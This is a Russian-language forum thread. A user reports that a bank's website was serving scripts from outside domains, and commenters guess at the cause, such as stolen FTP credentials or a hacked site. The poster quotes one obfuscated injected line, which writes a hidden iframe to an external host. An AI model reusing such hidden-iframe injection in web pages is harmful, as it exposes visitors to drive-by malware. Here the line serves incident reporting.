LINUX.ORG.RU
ФорумTalks

www.promo.ru - трояны из коробки?


0

1

Предысторию изложу покороче, суть такова. На прошлой неделе знакомый стукнулся в аську и сказал что при пождении на по сайту одного из банков (пусть будет просто банк) вдруг выскочило сообщение с предложением проиграть mp3 файл. Еще один привлеченный знакомый сказал что у него стартовала джава и заорал касперский, а хромиум в режиме разработчика показывает наличие скриптов с сайта geliksss.net У меня винды нет совсем, попробовал мозиллой, да, NoScript говорит что заблокирован сайт geliksss.net

В этом банке у меня работают знакомые админы, хотя за сайт непосредственно и не отвечают. Сообщил им, они говорят служба безопасности посмотрела - всё ок.

На следующий день (в пятницу) сайт лег совсем, в пятницу же вечером его восстановили, я снова зашел мозиллой, geliksss.net пропал, появились ссылки на applicaa.net. Скачал wget-ом страницы и скрипты, в одном из файлов с джаваскриптами нашел такую строку, дописанную в конец файла и не относящуюся ни к каким фнкциям.

document.write(«<»+«i»+«f»+«rame»+" sr"+«c='http://applicaa.net/forum2/13'»+" style='d"+«isplay:no»+«ne;'></»+«i»+«f»+«rame>»);

Снова отослал коллегам с приветом службе безопасности. Дальше было еще некоторое количество общения на эту тему, в результате выяснилось:
- эти ссылки в код запихнули сами разработчики сайта
- на вопрос службы безопасности «что это?» разработчики ответили, это механизм раскрутки сайта, нет причин для беспокойства
- при более пристальном поиске обнаружился пресловутый mp3 файл, ссылка на сайт и е-адрес иранской освободительной киберармии.

Разработчик сайта - http://promo.ru/ Не хочу сказать что они злодеи и негодяи, но среди их сотрудников такие, видимо, имеются. Так что кому актуально - обратите внимание :)

Трэш какой-то, лучше не иметь дела с такими или стукануть из-за «е-адрес иранской освободительной киберармии».

FiXer ★★☆☆☆
()

>promo.ru

ненужен

аську

ненужно

сообщение

ненужно

mp3 файл

ненужен

касперский

ненужен

//ну ты понел

thunar ★★★★★
()

ИМХО, статья так и плачет. Групповое, умышленное... лет на 20 точно можно упечь.

gh0stwizard ★★★★★
()
Ответ на: комментарий от thunar

>ненужен

ненужен

ненужен


ненужен


ненужен


ну ты понел



Ну ты понял, да? ;)

AX ★★★★★
()

Скорее всего сайт просто сломали и воткнули ифрейм с эксплоитом. А разработчки просто не хотят признаваться в своих косяках.

PoMbl4
()

>На прошлой неделе знакомый стукнулся в аську

Дальше не читал.

Siado ★★★★★
()

так называемые «разработчики» часто сидят под завирусованной виндой, вирусня ворует фтп-пароли и кладет вот такие вот модифицированные странички

www_linux_org_ru ★★★★★
()

Интересно узнать, что это был за банк? Небось колхозный какой?

Pantserovik
()

Похоже, что у кого-то украли пароль FTP, а тому лень оторвать руку от мышки и посмотреть, что за хренотень ему воткнули в код. 99,9% таких инцидентов - это именно кража пароля FTP.

Frakhtan-teh ★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.